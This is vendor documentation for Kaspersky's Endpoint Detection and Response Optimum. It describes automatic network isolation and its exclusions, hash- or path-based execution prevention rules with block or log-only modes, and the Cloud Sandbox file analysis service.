Endpoint Detection and Response Optimum

Network isolation

Automatic isolation of the computer from the network in response to detected threats.

When network isolation is turned on, the application severs all active connections and blocks all new TCP/IP connections on the computer. The application leaves only the following connections active:

• Connections listed in Network isolation exclusions.
• Connections initiated by Kaspersky Endpoint Security services.
• Connections initiated by the Kaspersky Security Center Network Agent.

Automatically unlock isolated computer in N hours

Network isolation can be turned off automatically after a specified time or manually. By default, Kaspersky Endpoint Security turns off Network isolation 8 hours after the start of the isolation.

Network isolation exclusions

List of rules for exclusions from network isolation. Network connections that match the rules are not blocked on computers when Network isolation is turned on.

To configure Network isolation exclusions, you can use a list of standard network profiles. By default, exclusions include network profiles containing rules that ensure uninterrupted operation of devices with the DNS/DHCP server and DNS/DHCP client roles. You can also modify the settings of standard network profiles or define exclusions manually.

Important: Exclusions specified in policy properties are applied only if Network isolation is turned on automatically in response to a detected threat. Exclusions specified in computer properties are applied only if Network isolation is turned on manually in computer properties in the Kaspersky Security Center console or in alert details.

Execution prevention

Execution prevention allows managing the running of executable files and scripts, as well as opening office format files. In this way, you can, for example, prevent the execution of applications that you consider insecure. As a result, the spreading of the threat can be stopped. Execution prevention supports a set of script interpreters.

To use Execution prevention component, you need to add execution prevention rules. Execution prevention rule is a set of criteria that the application takes into account when reacting to an object execution, for example when blocking object execution. The application identifies files by their paths or checksums calculated using MD5 and SHA256 hashing algorithms.

Action on execution or opening of forbidden object

Block and write to report. In this mode, the application blocks the execution of objects or opening of documents that match prevention rule criteria. The application also publishes an event about attempts to execute objects or open documents to the Kaspersky Security Center event log and the unified logging system.

Log events only. In this mode, Kaspersky Endpoint Security publishes an event about attempts to run executable objects or open documents that match prevention rule criteria to the Kaspersky Security Center event log and the unified logging system, but does not block the attempt to run or open the object or document. This mode is selected by default.

Cloud Sandbox

Cloud Sandbox is a technology that lets you detect advanced threats on a computer. Kaspersky Endpoint Security automatically forwards detected files to Cloud Sandbox for analysis. Cloud Sandbox runs these files in an isolated environment to identify malicious activity and decides on their reputation. Data on these files is then sent to Kaspersky Security Network. Therefore, if Cloud Sandbox has detected a malicious file, Kaspersky Endpoint Security will perform the appropriate action to eliminate this threat on all computers where this file is detected.

Note: Cloud Sandbox technology is permanently enabled and is available to all Kaspersky Security Network users regardless of the type of license they are using.